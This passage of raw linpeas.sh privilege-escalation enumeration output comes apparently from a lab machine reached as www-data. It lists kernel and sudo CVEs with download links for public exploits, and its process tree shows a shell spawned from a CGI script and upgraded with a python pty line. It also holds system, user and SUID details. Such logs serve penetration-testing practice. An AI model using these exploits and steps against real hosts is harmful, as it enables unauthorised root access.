https://www.exploit-db.com/download/40847 Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh [+] [CVE-2015-1328] overlayfs Details: http://seclists.org/oss-sec/2015/q2/717 Exposure: highly probable Tags: [ ubuntu=(12.04|14.04){kernel:3.13.0-(2|3|4|5)*-generic} ],ubuntu=(14.10|15.04){kernel:3.(13|16).0-*-generic} Download URL: https://www.exploit-db.com/download/37292 [+] [CVE-2021-3156] sudo Baron Samedit 2 Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt Exposure: probable Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10 Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main [+] [CVE-2017-6074] dccp Details: http://www.openwall.com/lists/oss-security/2017/02/22/3 Exposure: probable Tags: [ ubuntu=(14.04|16.04) ]{kernel:4.4.0-62-generic} Download URL: https://www.exploit-db.com/download/41458 Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass [+] [CVE-2016-2384] usb-midi Details: https://xairy.github.io/blog/2016/cve-2016-2384 Exposure: probable Tags: [ ubuntu=14.04 ],fedora=22 Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384/poc.c Comments: Requires ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user [+] [CVE-2015-8660] overlayfs (ovl_setattr) Details: http://www.halfdog.net/Security/2015/UserNamespaceOverlayfsSetuidWriteExec/ Exposure: probable Tags: [ ubuntu=(14.04|15.10) ]{kernel:4.2.0-(18|19|20|21|22)-generic} Download URL: https://www.exploit-db.com/download/39166 [+] [CVE-2015-3202] fuse (fusermount) Details: http://seclists.org/oss-sec/2015/q2/520 Exposure: probable Tags: debian=7.0|8.0,[ ubuntu=* ] Download URL: https://www.exploit-db.com/download/37089 Comments: Needs cron or system admin interaction [+] [CVE-2021-3156] sudo Baron Samedit Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt Exposure: less probable Tags: mint=19,ubuntu=18|20, debian=10 Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main [+] [CVE-2021-22555] Netfilter heap out-of-bounds write Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html Exposure: less probable Tags: ubuntu=20.04{kernel:5.8.0-*} Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c Comments: ip_tables kernel module must be loaded [+] [CVE-2019-18634] sudo pwfeedback Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/ Exposure: less probable Tags: mint=19 Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c Comments: sudo configuration requires pwfeedback to be enabled. [+] [CVE-2019-15666] XFRM_UAF Details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc Exposure: less probable Download URL: Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled [+] [CVE-2018-1000001] RationalLove Details: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/ Exposure: less probable Tags: debian=9{libc6:2.24-11+deb9u1},ubuntu=16.04.3{libc6:2.23-0ubuntu9} Download URL: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/RationalLove.c Comments: kernel.unprivileged_userns_clone=1 required [+] [CVE-2017-7308] af_packet Details: https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html Exposure: less probable Tags: ubuntu=16.04{kernel:4.8.0-(34|36|39|41|42|44|45)-generic} Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308/poc.c ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-7308/poc.c Comments: CAP_NET_RAW cap or CONFIG_USER_NS=y needed. Modified version at 'ext-url' adds support for additional kernels [+] [CVE-2017-1000366,CVE-2017-1000379] linux_ldso_hwcap_64 Details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt Exposure: less probable Tags: debian=7.7|8.5|9.0,ubuntu=14.04.2|16.04.2|17.04,fedora=22|25,centos=7.3.1611 Download URL: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_hwcap_64.c Comments: Uses "Stack Clash" technique, works against most SUID-root binaries [+] [CVE-2017-1000253] PIE_stack_corruption Details: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.txt Exposure: less probable Tags: RHEL=6,RHEL=7{kernel:3.10.0-514.21.2|3.10.0-514.26.1} Download URL: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.c [+] [CVE-2016-9793] SO_{SND|RCV}BUFFORCE Details: https://github.com/xairy/kernel-exploits/tree/master/CVE-2016-9793 Exposure: less probable Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-9793/poc.c Comments: CAP_NET_ADMIN caps OR CONFIG_USER_NS=y needed. No SMEP/SMAP/KASLR bypass included. Tested in QEMU only [+] [CVE-2015-9322] BadIRET Details: http://labs.bromium.com/2015/02/02/exploiting-badiret-vulnerability-cve-2014-9322-linux-kernel-privilege-escalation/ Exposure: less probable Tags: RHEL<=7,fedora=20 Download URL: http://site.pi3.com.pl/exp/p_cve-2014-9322.tar.gz [+] [CVE-2015-8660] overlayfs (ovl_setattr) Details: http://www.halfdog.net/Security/2015/UserNamespaceOverlayfsSetuidWriteExec/ Exposure: less probable Download URL: https://www.exploit-db.com/download/39230 [+] [CVE-2015-3290] espfix64_NMI Details: http://www.openwall.com/lists/oss-security/2015/08/04/8 Exposure: less probable Download URL: https://www.exploit-db.com/download/37722 [+] [CVE-2014-5207] fuse_suid Details: https://www.exploit-db.com/exploits/34923/ Exposure: less probable Download URL: https://www.exploit-db.com/download/34923 [+] [CVE-2014-4014] inode_capable Details: http://www.openwall.com/lists/oss-security/2014/06/10/4 Exposure: less probable Tags: ubuntu=12.04 Download URL: https://www.exploit-db.com/download/33824 [+] [CVE-2014-0196] rawmodePTY Details: http://blog.includesecurity.com/2014/06/exploit-walkthrough-cve-2014-0196-pty-kernel-race-condition.html Exposure: less probable Download URL: https://www.exploit-db.com/download/33516 [+] [CVE-2014-0038] timeoutpwn Details: http://blog.includesecurity.com/2014/03/exploit-CVE-2014-0038-x32-recvmmsg-kernel-vulnerablity.html Exposure: less probable Tags: ubuntu=13.10 Download URL: https://www.exploit-db.com/download/31346 Comments: CONFIG_X86_X32 needs to be enabled [+] [CVE-2014-0038] timeoutpwn 2 Details: http://blog.includesecurity.com/2014/03/exploit-CVE-2014-0038-x32-recvmmsg-kernel-vulnerablity.html Exposure: less probable Tags: ubuntu=(13.04|13.10){kernel:3.(8|11).0-(12|15|19)-generic} Download URL: https://www.exploit-db.com/download/31347 Comments: CONFIG_X86_X32 needs to be enabled [+] [CVE-2016-0728] keyring Details: http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/ Exposure: less probable Download URL: https://www.exploit-db.com/download/40003 Comments: Exploit takes about ~30 minutes to run. Exploit is not reliable, see: https://cyseclabs.com/blog/cve-2016-0728-poc-not-working ╔══════════╣ Executing Linux Exploit Suggester 2 ╚ https://github.com/jondonas/linux-exploit-suggester-2 [1] exploit_x CVE-2018-14665 Source: http://www.exploit-db.com/exploits/45697 [2] overlayfs CVE-2015-8660 Source: http://www.exploit-db.com/exploits/39230 [3] pp_key CVE-2016-0728 Source: http://www.exploit-db.com/exploits/39277 [4] timeoutpwn CVE-2014-0038 Source: http://www.exploit-db.com/exploits/31346 ╔══════════╣ Protections ═╣ AppArmor enabled? .............. You do not have enough privilege to read the profile set. apparmor module is loaded. ═╣ grsecurity present? ............ grsecurity Not Found ═╣ PaX bins present? .............. PaX Not Found ═╣ Execshield enabled? ............ Execshield Not Found ═╣ SELinux enabled? ............... sestatus Not Found ═╣ Is ASLR enabled? ............... Yes ═╣ Printer? ....................... No ═╣ Is this a virtual machine? ..... Yes ╔═══════════╗ ═════════════════════════════════════════════╣ Container ╠═════════════════════════════════════════════ ╚═══════════╝ ╔══════════╣ Container related tools present ╔══════════╣ Container details ═╣ Is this a container? ........... No ═╣ Any running containers? ........ No ╔════════════════════════════════════════════════╗ ══════════════════════════╣ Processes, Crons, Timers, Services and Sockets ╠══════════════════════════ ╚════════════════════════════════════════════════╝ ╔══════════╣ Cleaned processes ╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes root 1 0.0 0.2 33388 2648 ? Ss 19:10 0:01 /sbin/init root 312 0.0 0.1 19740 1060 ? S 19:10 0:00 upstart-udev-bridge --daemon[0m root 317 0.0 0.1 51504 1836 ? Ss 19:10 0:00 /lib/systemd/systemd-udevd --daemon root 401 0.0 0.0 15280 412 ? S 19:10 0:00 upstart-file-bridge --daemon[0m message+ 403 0.0 0.1 39116 1024 ? Ss 19:10 0:00 dbus-daemon --system --fork root 418 0.0 0.1 35028 1568 ? Ss 19:10 0:00 /lib/systemd/systemd-logind syslog 474 0.0 0.1 255844 1368 ? Ssl 19:10 0:00 rsyslogd root 533 0.0 0.0 15264 396 ? S 19:10 0:00 upstart-socket-bridge --daemon[0m root 582 0.0 0.2 10232 2808 ? Ss 19:10 0:00 dhclient -1 -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases eth0 root 724 0.0 0.0 15820 960 tty4 Ss+ 19:10 0:00 /sbin/getty -8 38400 tty4 root 726 0.0 0.0 15820 944 tty5 Ss+ 19:10 0:00 /sbin/getty -8 38400 tty5 root 729 0.0 0.0 15820 952 tty2 Ss+ 19:10 0:00 /sbin/getty -8 38400 tty2 root 730 0.0 0.0 15820 948 tty3 Ss+ 19:10 0:00 /sbin/getty -8 38400 tty3 root 732 0.0 0.0 15820 956 tty6 Ss+ 19:10 0:00 /sbin/getty -8 38400 tty6 root 748 0.0 0.2 61368 3036 ? Ss 19:10 0:00 /usr/sbin/sshd -D root 772 0.0 0.0 23656 880 ? Ss 19:10 0:00 cron root 878 0.0 0.2 75520 2672 ? Ss 19:10 0:00 /usr/sbin/apache2 -k start www-data 881 0.0 0.1 75260 1736 ? S 19:10 0:00 _ /usr/sbin/apache2 -k start www-data 882 0.0 0.4 561452 4984 ? Sl 19:10 0:00 _ /usr/sbin/apache2 -k start www-data 1040 0.0 0.1 9512 1148 ? S 19:35 0:00 | _ /bin/bash /usr/lib/cgi-bin/test.cgi www-data 1041 0.0 0.1 18148 1960 ? S 19:35 0:00 | _ /bin/bash -i www-data 1051 0.0 0.5 35268 5796 ? S 19:38 0:00 | _ python3 -c import pty;pty.spawn("/bin/bash") www-data 1052 0.0 0.1 18148 1952 pts/0 Ss 19:38 0:00 | _ /bin/bash www-data 1063 0.3 0.1 5276 1528 pts/0 S+ 19:43 0:00 | _ /bin/sh ./linpeas.sh www-data 5317 0.0 0.0 5276 928 pts/0 S+ 19:44 0:00 | _ /bin/sh ./linpeas.sh www-data 5321 0.0 0.1 15724 1216 pts/0 R+ 19:44 0:00 | | _ ps fauxwww www-data 5320 0.0 0.0 5276 928 pts/0 S+ 19:44 0:00 | _ /bin/sh ./linpeas.sh www-data 883 0.0 0.4 495844 4976 ? Sl 19:10 0:00 _ /usr/sbin/apache2 -k start root 962 0.0 0.0 15820 944 tty1 Ss+ 19:11 0:00 /sbin/getty -8 38400 tty1 ╔══════════╣ Binary processes permissions (non 'root root' and not belonging to current user) ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes ╔══════════╣ Files opened by processes belonging to other users ╚ This is usually empty because of the lack of privileges to read other user processes information COMMAND PID TID USER FD TYPE DEVICE SIZE/OFF NODE NAME ╔══════════╣ Processes with credentials in memory (root req) ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#credentials-from-process-memory gdm-password Not Found gnome-keyring-daemon Not Found lightdm Not Found vsftpd Not Found apache2 process found (dump creds from memory as root) sshd Not Found ╔══════════╣ Cron jobs ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs /usr/bin/crontab incrontab Not Found -rw-r--r-- 1 root root 722 Feb 8 2013 /etc/crontab /etc/cron.d: total 12 drwxr-xr-x 2 root root 4096 Sep 2 2020 . drwxr-xr-x 86 root root 4096 Jan 7 19:10 .. -rw-r--r-- 1 root root 102 Feb 8 2013 .placeholder /etc/cron.daily: total 68 drwxr-xr-x 2 root root 4096 Sep 2 2020 . drwxr-xr-x 86 root root 4096 Jan 7 19:10 .. -rw-r--r-- 1 root root 102 Feb 8 2013 .placeholder -rwxr-xr-x 1 root root 625 Apr 3 2019 apache2 -rwxr-xr-x 1 root root 15481 Apr 10 2014 apt -rwxr-xr-x 1 root root 314 Feb 17 2014 aptitude -rwxr-xr-x 1 root root 355 Jun 4 2013 bsdmainutils -rwxr-xr-x 1 root root 256 Mar 7 2014 dpkg -rwxr-xr-x 1 root root 372 Jan 22 2014 logrotate -rwxr-xr-x 1 root root 1261 Apr 10 2014 man-db -rwxr-xr-x 1 root root 435 Jun 20 2013 mlocate -rwxr-xr-x 1 root root 249 Feb 16 2014 passwd -rwxr-xr-x 1 root root 2417 May 13 2013 popularity-contest -rwxr-xr-x 1 root root 328 Jul 18 2014 upstart /etc/cron.hourly: total 12 drwxr-xr-x 2 root root 4096 Sep 2 2020 . drwxr-xr-x 86 root root 4096 Jan 7 19:10 .. -rw-r--r-- 1 root root 102 Feb 8 2013 .placeholder /etc/cron.monthly: total 12 drwxr-xr-x 2 root root 4096 Sep 2 2020 . drwxr-xr-x 86 root root 4096 Jan 7 19:10 .. -rw-r--r-- 1 root root 102 Feb 8 2013 .placeholder /etc/cron.weekly: total 24 drwxr-xr-x 2 root root 4096 Sep 2 2020 . drwxr-xr-x 86 root root 4096 Jan 7 19:10 .. -rw-r--r-- 1 root root 102 Feb 8 2013 .placeholder -rwxr-xr-x 1 root root 730 Feb 23 2014 apt-xapian-index -rwxr-xr-x 1 root root 427 Apr 16 2014 fstrim -rwxr-xr-x 1 root root 771 Apr 10 2014 man-db SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) ╔══════════╣ Systemd PATH ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#systemd-path-relative-paths ╔══════════╣ Analyzing .service files ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services You can't write on systemd PATH ╔══════════╣ System timers ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers ╔══════════╣ Analyzing .timer files ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers ╔══════════╣ Analyzing .socket files ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets /lib/systemd/system/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket /lib/systemd/system/dbus.target.wants/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket /lib/systemd/system/sockets.target.wants/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket ╔══════════╣ Unix Sockets Listening ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets /com/ubuntu/upstart /dev/log └─(Read Write) /run/apache2/cgisock.878 └─(Read Write) /run/dbus/system_bus_socket └─(Read Write) /run/udev/control └─(Read ) /var/run/apache2/cgisock.878 └─(Read Write) /var/run/dbus/system_bus_socket └─(Read Write) ╔══════════╣ D-Bus config files ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus ╔══════════╣ D-Bus Service Objects list ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus busctl Not Found ╔═════════════════════╗ ════════════════════════════════════════╣ Network Information ╠════════════════════════════════════════ ╚═════════════════════╝ ╔══════════╣ Hostname, hosts and DNS ubuntu 127.0.0.1 localhost 127.0.1.1 ubuntu ::1 localhost ip6-localhost ip6-loopback ff02::1 ip6-allnodes ff02::2 ip6-allrouters nameserver 10.0.0.2 search eu-west-1.compute.internal ╔══════════╣ Interfaces # symbolic names for networks, see networks(5) for more information link-local 169.254.0.0 eth0 Link encap:Ethernet HWaddr 02:e0:42:47:18:a7 inet addr:10.10.249.163 Bcast:10.10.255.255 Mask:255.255.0.0 inet6 addr: fe80::e0:42ff:fe47:18a7/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:9001 Metric:1 RX packets:1108 errors:0 dropped:0 overruns:0 frame:0 TX packets:892 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:849336 (849.3 KB) TX bytes:268891 (268.8 KB) lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:65536 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) ╔══════════╣ Active Ports ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - tcp6 0 0 :::80 :::* LISTEN - tcp6 0 0 :::22 :::* LISTEN - ╔══════════╣ Can I sniff with tcpdump? No ╔═══════════════════╗ ═════════════════════════════════════════╣ Users Information ╠═════════════════════════════════════════ ╚═══════════════════╝ ╔══════════╣ My user ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#users uid=33(www-data) gid=33(www-data) groups=33(www-data) ╔══════════╣ Do I have PGP keys? /usr/bin/gpg netpgpkeys Not Found netpgp Not Found ╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid ╔══════════╣ Checking sudo tokens ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens ptrace protection is enabled (1) gdb wasn't found in PATH, this might still be vulnerable but linpeas won't be able to check it ╔══════════╣ Checking Pkexec policy ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#pe-method-2 ╔══════════╣ Superusers root:x:0:0:root:/root:/bin/bash ╔══════════╣ Users with console root:x:0:0:root:/root:/bin/bash ryan:x:1000:1000:Ubuntu 14.04.1,,,:/home/ryan:/bin/bash ╔══════════╣ All users & groups uid=0(root) gid=0(root) groups=0(root) uid=1(daemon[0m) gid=1(daemon[0m) groups=1(daemon[0m) uid=10(uucp) gid=10(uucp) groups=10(uucp) uid=100(libuuid) gid=101(libuuid) groups=101(libuuid) uid=1000(ryan) gid=1000(ryan) groups=1000(ryan) uid=101(syslog) gid=104(syslog) groups=104(syslog),4(adm) uid=102(messagebus) gid=105(messagebus) groups=105(messagebus) uid=103(sshd) gid=65534(nogroup) groups=65534(nogroup) uid=13(proxy) gid=13(proxy) groups=13(proxy) uid=2(bin) gid=2(bin) groups=2(bin) uid=3(sys) gid=3(sys) groups=3(sys) uid=33(www-data) gid=33(www-data) groups=33(www-data) uid=34(backup) gid=34(backup) groups=34(backup) uid=38(list) gid=38(list) groups=38(list) uid=39(irc) gid=39(irc) groups=39(irc) uid=4(sync) gid=65534(nogroup) groups=65534(nogroup) uid=41(gnats) gid=41(gnats) groups=41(gnats) uid=5(games) gid=60(games) groups=60(games) uid=6(man) gid=12(man) groups=12(man) uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) uid=7(lp) gid=7(lp) groups=7(lp) uid=8(mail) gid=8(mail) groups=8(mail) uid=9(news) gid=9(news) groups=9(news) ╔══════════╣ Login now 19:44:07 up 33 min, 0 users, load average: 0.08, 0.03, 0.05 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT ╔══════════╣ Last logons wtmp begins Sat Jan 7 19:10:55 2023 ╔══════════╣ Last time logon each user Username Port From Latest ╔══════════╣ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...) ╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!! ╔══════════════════════╗ ═══════════════════════════════════════╣ Software Information ╠═══════════════════════════════════════ ╚══════════════════════╝ ╔══════════╣ Useful software /usr/bin/base64 /usr/bin/curl /usr/bin/gcc /bin/nc /bin/netcat /usr/bin/perl /bin/ping /usr/bin/python /usr/bin/python2 /usr/bin/python2.7 /usr/bin/python3 /usr/bin/sudo /usr/bin/wget ╔══════════╣ Installed Compilers ii gcc 4:4.8.2-1ubuntu6 amd64 GNU C compiler ii gcc-4.8 4.8.4-2ubuntu1~14.04.4 amd64 GNU C compiler /usr/bin/gcc ╔══════════╣ Searching mysql credentials and exec ╔══════════╣ Analyzing Apache-Nginx Files (limit 70) Apache version: Server version: Apache/2.4.7 (Ubuntu) Server built: Apr 3 2019 18:04:25 httpd Not Found Nginx version: nginx Not Found ./linpeas.sh: 2593: ./linpeas.sh: grep -R -B1 "httpd-php" /etc/apache2 2>/dev/null: not found ══╣ PHP exec extensions drwxr-xr-x 2 root root 4096 Sep 2 2020 /etc/apache2/sites-enabled drwxr-xr-x 2 root root 4096 Sep 2 2020 /etc/apache2/sites-enabled lrwxrwxrwx 1 root root 35 Sep 2 2020 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf <VirtualHost *:80> ServerAdmin webmaster@localhost DocumentRoot /var/www/html ErrorLog ${APACHE_LOG_DIR}/error.log CustomLog ${APACHE_LOG_DIR}/access.log combined </VirtualHost> -rw-r--r-- 1 root root 1332 Nov 26 2018 /etc/apache2/sites-available/000-default.conf <VirtualHost *:80> ServerAdmin webmaster@localhost DocumentRoot /var/www/html ErrorLog ${APACHE_LOG_DIR}/error.log CustomLog ${APACHE_LOG_DIR}/access.log combined </VirtualHost> lrwxrwxrwx 1 root root 35 Sep 2 2020 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf <VirtualHost *:80> ServerAdmin webmaster@localhost DocumentRoot /var/www/html ErrorLog ${APACHE_LOG_DIR}/error.log CustomLog ${APACHE_LOG_DIR}/access.log combined </VirtualHost> ╔══════════╣ Analyzing Rsync Files (limit 70) -rw-r--r-- 1 root root 1044 Apr 17 2014 /usr/share/doc/rsync/examples/rsyncd.conf [ftp] comment = public archive path = /var/www/pub use chroot = yes lock file = /var/lock/rsyncd read only = yes list = yes uid = nobody gid = nogroup strict modes = yes ignore errors = no ignore nonreadable = yes transfer logging = no timeout = 600 refuse options = checksum dry-run dont compress = *.gz *.tgz *.zip *.z *.rpm *.deb *.iso *.bz2 *.tbz ╔══════════╣ Analyzing Ldap Files (limit 70) The password hash is from the {SSHA} to 'structural' drwxr-xr-x 2 root root 4096 Sep 2 2020 /etc/ldap ╔══════════╣ Searching ssl/ssh files Port 22 PermitRootLogin without-password PubkeyAuthentication yes PermitEmptyPasswords no ChallengeResponseAuthentication no UsePAM yes ./linpeas.sh: 2779: ./linpeas.sh: gpg-connect-agent: not found ══╣ Some home ssh config file was found /usr/share/doc/openssh-client/examples/sshd_config AuthorizedKeysFile .ssh/authorized_keys UsePrivilegeSeparation sandbox # Default for new installations. Subsystem sftp /usr/libexec/sftp-server ══╣ /etc/hosts.allow file found, trying to read the rules: /etc/hosts.allow Searching inside /etc/ssh/ssh_config for interesting info Host * SendEnv LANG LC_* HashKnownHosts yes GSSAPIAuthentication yes GSSAPIDelegateCredentials no ╔══════════╣ Analyzing PAM Auth Files (limit 70) drwxr-xr-x 2 root root 4096 Sep 2 2020 /etc/pam.d -rw-r--r-- 1 root root 2139 May 2 2014 /etc/pam.d/sshd ╔══════════╣ Analyzing Keyring Files (limit 70) drwxr-xr-x 2 root root 4096 Sep 2 2020 /usr/share/keyrings drwxr-xr-x 2 root root 4096 Sep 2 2020 /var/lib/apt/keyrings ╔══════════╣ Searching uncommon passwd files (splunk) passwd file: /etc/pam.d/passwd passwd file: /etc/passwd passwd file: /usr/share/bash-completion/completions/passwd passwd file: /usr/share/lintian/overrides/passwd ╔══════════╣ Analyzing PGP-GPG Files (limit 70) /usr/bin/gpg gpg Not Found netpgpkeys Not Found netpgp Not Found -rw-r--r-- 1 root root 12335 Jul 22 2014 /etc/apt/trusted.gpg -rw-r--r-- 1 root root 1724 Jun 13 2014 /usr/share/apt/ubuntu-archive.gpg -rw-r--r-- 1 root root 12335 May 18 2012 /usr/share/keyrings/ubuntu-archive-keyring.gpg -rw-r--r-- 1 root root 0 May 18 2012 /usr/share/keyrings/ubuntu-archive-removed-keys.gpg -rw-r--r-- 1 root root 1227 May 18 2012 /usr/share/keyrings/ubuntu-master-keyring.gpg -rw-r--r-- 1 root root 12335 Jul 22 2014 /var/lib/apt/keyrings/ubuntu-archive-keyring.gpg -rw-r--r-- 1 root root 933 May 8 2014 /var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_trusty_Release.gpg -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux) iEYEABEKAAYFAlNrkrEACgkQQJdur0N9BbV7RgCfbZGjC7ejdU5fMW6Kbk6bRQcS G2sAn1h7znlqgxolQOhYVAnsfmu96aTbiQIcBAABCgAGBQJTa5KxAAoJEDtP5qzA sh8yat4QALTR1k1DKijcCu9NHWm0p5iz6+cFOmUnYS8ewjhS3Oy5mk9WjXLTpOID BBykbsXnNIEpx4nvPhwX2jb/8XJNIT5pyhHDD7ydbQsDsQnhaah1gBwd5ZP3gwpF 9IGJ15V4737rqeifYNKohn8//4GQsoIuhzyMOqIq8lIpOJyKzWvJm9ToW7kurF1d yQvB2rdXgOLUgXnpzsLu3Xw/p0bY+OUkdTxbfg+UxOIvwI1DYOPrTq/vPunMkA0C QuXv7yTdYiWWoV3IUqzF5iwY0nJAcfH6bBmyXXgr9WY9QXSw+CUjMfTI3EPCG8Rw 8Z9z7LJ8zeH7DucaDkSVmPUE8uKPspc7CHuZ5b09O435TdbiargNAXwRNKKlEXcr 1bQ2CZfve5jxKv3g7xEk4C/LpNMd/0w7DsqIuw6lRwoc4vNqdPlQMjywnHFNYTDl s5Tilg2T2pSE9SRRhLQtGAVP2VU5AD/WJfAUDHM5zLm9avZKsOphiTuXDJkaZxr7 eMn1kQyzCh30ac9zJukh8PfEREY/BT8JFC7qWWUZ2zeevsOQZJ0WHL/lm6TZRsgX 84qD7Z2UrTClnTNd6CUKHm6ispT9uC/BTFZ7efrw8mTPJotBNOpPNgmOVXFKsuoh SyHY769UhUN2MeCGjsLjee5jRg2moS421UmBZbeRgicH92BUaWzL =7r4e -----END PGP SIGNATURE----- ╔══════════╣ Analyzing Other Interesting Files (limit 70) -rw-r--r-- 1 root root 3637 Apr 8 2014 /etc/skel/.bashrc -rw-r--r-- 1 ryan ryan 3637 Sep 2 2020 /home/ryan/.bashrc -rw-r--r-- 1 root root 675 Apr 8 2014 /etc/skel/.profile -rw-r--r-- 1 ryan ryan 675 Sep 2 2020 /home/ryan/.profile ╔═══════════════════╗ ═════════════════════════════════════════╣ Interesting Files ╠═════════════════════════════════════════ ╚═══════════════════╝ ╔══════════╣ SUID - Check easy privesc, exploits and write perms ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid -rwsr-xr-x 1 root root 44K May 7 2014 /bin/ping6 -rwsr-xr-x 1 root root 31K Dec 16 2013 /bin/fusermount -rwsr-xr-x 1 root root 93K Jun 3 2014 /bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8 -rwsr-xr-x 1 root root 44K May 7 2014 /bin/ping -rwsr-xr-x 1 root root 37K Feb 16 2014 /bin/su -rwsr-xr-x 1 root root 68K Jun 3 2014 /bin/umount ---> BSD/Linux(08-1996) -rwsr-xr-x 1 root root 46K Feb 16 2014 /usr/bin/chfn ---> SuSE_9.3/10 -rwsr-xr-x 1 root root 23K May 7 2014 /usr/bin/traceroute6.iputils -rwsr-xr-x 1 root root 41K Feb 16 2014 /usr/bin/chsh -rwsr-xr-x 1 root root 152K Feb 10 2014 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable -rwsr-xr-x 1 root root 32K Feb 16 2014 /usr/bin/newgrp ---> HP-UX_10.20 -rwsr-xr-x 1 root root 67K Feb 16 2014 /usr/bin/gpasswd -rwsr-xr-x 1 root root 74K Oct 21 2013 /usr/bin/mtr -rwsr-xr-x 1 root root 46K Feb 16 2014 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997) -rwsr-xr-x 1 root root 10K Feb 25 2014 /usr/lib/eject/dmcrypt-get-device -rwsr-xr-x 1 root root 431K Mar 4 2019 /usr/lib/openssh/ssh-keysign -rwsr-xr-- 1 root messagebus 304K Jul 3 2014 /usr/lib/dbus-1.0/dbus-daemon-launch-helper -rwsr-xr-x 1 root root 11K Apr 12 2014 /usr/lib/pt_chown ---> GNU_glibc_2.1/2.1.1_-6(08-1999) -rwsr-xr-- 1 root dip 336K Jan 22 2013 /usr/sbin/pppd ---> Apple_Mac_OSX_10.4.8(05-2007) -rwsr-sr-x 1 libuuid libuuid 19K Jun 3 2014 /usr/sbin/uuidd ╔══════════╣ SGID ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid -rwxr-sr-x 1 root crontab 36K Feb 